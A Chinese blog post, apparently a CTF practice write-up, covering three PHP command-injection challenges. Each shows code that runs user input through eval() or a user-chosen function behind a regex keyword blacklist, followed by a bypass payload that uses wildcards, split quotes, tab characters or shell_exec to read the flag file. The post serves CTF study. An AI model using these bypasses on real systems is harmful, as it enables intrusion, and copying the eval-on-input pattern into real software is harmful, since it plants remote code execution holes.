记录CTF命令执行练习中遇到的几道题(一些PHP命令过滤的绕过方法)

已于 2022-10-01 19:32:18 修改
阅读量1.5k 收藏 5
点赞数
分类专栏: CTF 文章标签: php linux 开发语言
于 2022-10-01 19:25:49 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_40103894/article/details/127136451
版权

题目1

		if (isset($_GET["Command"]) && $_GET["Command"]) {
			$command = $_GET["Command"];
			if (!preg_match("/f|a|g|flag|cat|tac|more|ls|\'|\*|system|exec|popen|passthru|shell_exec|assert|eval/i", $command)) {
				eval($command);
			} else {
				echo "nonono~";
			}
		}

过滤了一些flag关键字和命令执行函数,发现echo、nl可用,用通配符?替代被过滤的关键字。

payload

?Command=echo `nl /?l??`;

题目2

		if (isset($_GET["Command1"]) && isset($_GET["Command2"])) {
			$com1 = $_GET["Command1"];
			$com2 = $_GET["Command2"];
			if (!preg_match("/cat|tac|nl|more|less|tail|head|ls|\'|\*| |flag/i", $com2)) {
				$com1($com2);
			} else {
				echo "nonono~";
			}
		}

过滤和空格和一些输出内容的函数,用以下方法绕过:

payload

?Command1=system&Command2=ta"c"%09/fla?

题目3

    	if (isset($_GET["Command1"])) {
    		$com1 = $_GET["Command1"];
    		if (!preg_match("/eval|assert|system|passthru|\`|file_get_contents|readfile|show_source|include|include_once|require|require_once|highlight_file|\?|flag/i", $com1)) {
    			eval($com1);
    		} else {
    			echo "nonono~";
    		}
    	}

过滤了一些命令执行函数,用shell_exec可以绕过,注意shell_exec没有输出,需要用echo输出结果,用两个单引号过滤对flag的过滤,反斜杠\也可以。

payload

?Command1=echo shell_exec("tac /fl''ag");
复苏之枫
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTF---Web---文件包含---11---构造访问路径+过滤php代码
qq_22160557的博客
08-01 2109
文章目录前言一、目描述二、解步骤1、寻找上传点2、上传一句话木马3、构造访问路径3、绕过php代码过滤4、蚁剑连接三、总结 前言 目分类: CTF—Web—文件包含—11—构造访问路径+过滤php代码 一、目描述 目:Bugku—文件包含2 http://114.67.246.176:13862/index.php?file=hello.php 二、解步骤 1、寻找上传点 Step1:右键源代码,发现上传页面upload.php 2、上传一句话木马 Step2:因上传文件有限制,所以将一
ctf php 字符串 过滤,ctfshow命令执行(50)与常见过滤的思考
weixin_39667041的博客
03-25 2526
源码:if(isset($_GET['c'])){$c=$_GET['c'];if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|awk|strings|od|curl|\`|\%|\x09|\x26/i", $c)){system($c." >/dev/null 2>&1")...
【Web】H&NCTF 2024 解(部分)
最新发布
uuzeray的博客
05-14 1167
先切回ctfer,sudo adduser kobe创建一个kobe用户。目是对java文件进行编译操作,就是系统命令执行javac拼接文件名。./main.go是403访问./main-old.zip下载附件。是一个方便的命令行工具,用于在 Linux 系统管理用户账户。查看/var/mail/ctfgame,读邮件的敏感信息。没权限看/etc/sudoers ,用sudo -l。命令的特权,而且无需输入密码,但被限制不能以。看到kobe,可以apt-get提权。结合源码,能看出考的是sql注入。
ctfshow——54命令执行,需要严格的过滤
manerzi的博客
11-02 950
ctfshow——54命令执行,需要严格的过滤
base解码_php://filter在一次CTFbase被过滤的利用
weixin_39565910的博客
11-27 863
0x00 简介在一次线下ctf的web有一道关于php://filter伪协议的利用0x01目分析靶机环境http://192.168.1.151:88/flag.php 存放flag信息的http://192.168.1.151:88/index.php 注释有include1.phpinclude1代码如下error_reporting(0); @$file = $_G...
CTFphp://filter特殊编码绕过小汇总
qq_39947980的博客
03-28 777
php://filter是一个伪协议,它允许你读取经过过滤器处理的数据流。过滤器可以执行各种转换,如 base64 编码/解码、字符串压缩/解压缩等它的存在是数据流和控制流的“间人”,有点类似我们抓包工具Burp的感觉,我们可以人为进行操控更改。
ctf+任意命令执行RCE+常见系统命令+web安全
10-08
ctf+RCE+常见系统命令+web安全
php突破命令限制执行系统命令
05-09
php突破命令限制执行系统命令 可以用于ctf 实战 等多领域使用 十分实用,可以用于突破system等命令被限制的时候
CTF-100.-天天练习-学习
11-01
CTF-100.-----------------天天练习------------------学习 100小,试例练习
CTF-入门练习
10-30
这个“CTF-入门练习”很可能包含了一系列这样的挑战,旨在帮助初学者提升在网络安全领域的技能。 【网络攻防】 网络攻防是CTF的核心部分,涉及攻击者与防御者的对抗。攻击者可能试图寻找系统漏洞,进行SQL注入...
主要收集大大小小的ctf比赛自己做过的一些.zip
10-01
主要收集大大小小的ctf比赛自己做过的一些
PHP屏蔽过滤指定关键字的方法
10-25
主要介绍了PHP屏蔽过滤指定关键字的方法,包含了字符串的过滤处理与数组的遍历等技巧,非常具有实用价值,需要的朋友可以参考下
【网络安全 | CTF】攻防世界 file_include 解详析(php伪协议+convert转换过滤器)
等风来
07-31 4675
也就是说我们修改POC之后得到的check.php的内容其实是逻辑判断代码,与flag无关。由代码审计可知,可通过filename参数构造POC,来读取check.php。回显的代码使用了正则表达式来匹配指定的字符串,如果输入包含了。故猜想flag在flag.php,修改POC即可得到flag。该涉及到 convert转换过滤器。的任何一个字符串,就会关闭脚本。猜测关键字被过滤,怎么办呢?目描述:怎么读取文件呢?对于本,将初始POC。
Buuctf web真1(php伪协议&Rce过滤绕过&md5()小bug&http)
weixin_63231007的博客
04-05 2081
[ACTF2020 新生赛]Include 考察利用php://filter伪协议进行文件包含 首先尝试php://input伪协议: 发现被过滤。 然后尝试使用php://filter伪协议来继续包含, 构造playloads:php://filter/read=convert.base64-encode/resource=flag.php 得到base码。 将其进行解码,得到flag。 ......
CTF下的命令执行
Lemon's blog
04-28 9509
前言: 之前学习过命令执行,但不是太深入,这次通过目的训练来深入学习一下命令执行
php 函数 沙盒,转:LNMP虚拟主机PHP沙盒绕过/命令执行(php exec命令被禁之后)
weixin_32252271的博客
03-10 218
LNMP虚拟主机PHP沙盒绕过/命令执行lnmp更新1.2版本,很多东西都升级了,很棒。不过还是发现一个BUG。LNMP是一款linux下nginx、php、mysql一键安装包。执行一个命令即可简单安装。漏洞详情LNMP是这样配置沙盒的:disable_functions,配置在 include/php.sh: 其值为:1passthru,exec,system,chroot,scandir,...
CTFHub | 过滤空格
尼泊罗河伯的博客
06-20 1056
检查网页源代码发现这如果有空格就不会执行,说明这对空格做了过滤处理。同样在输入框输入 IP 进行测试,可以正常回显。
命令执行绕过姿势
qq_45888826的博客
10-04 644
命令执行绕过姿势
攻防世界CTF —— PHP本地文件包含漏洞解思路
weixin_47610939的博客
07-27 4013
攻防世界的CTF web类目,关于php本地文件包含漏洞的解思路
ctfshow-web41~60-WP
02-21
"ctfshow-web41~60-WP 是一系列关于网络安全竞赛(CTF,Capture The Flag)的Web安全目,主要涉及命令注入漏洞的利用与绕过技巧。这些目逐步增加难度,帮助参赛者提升在实战发现和解决安全问的能力。" 在...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值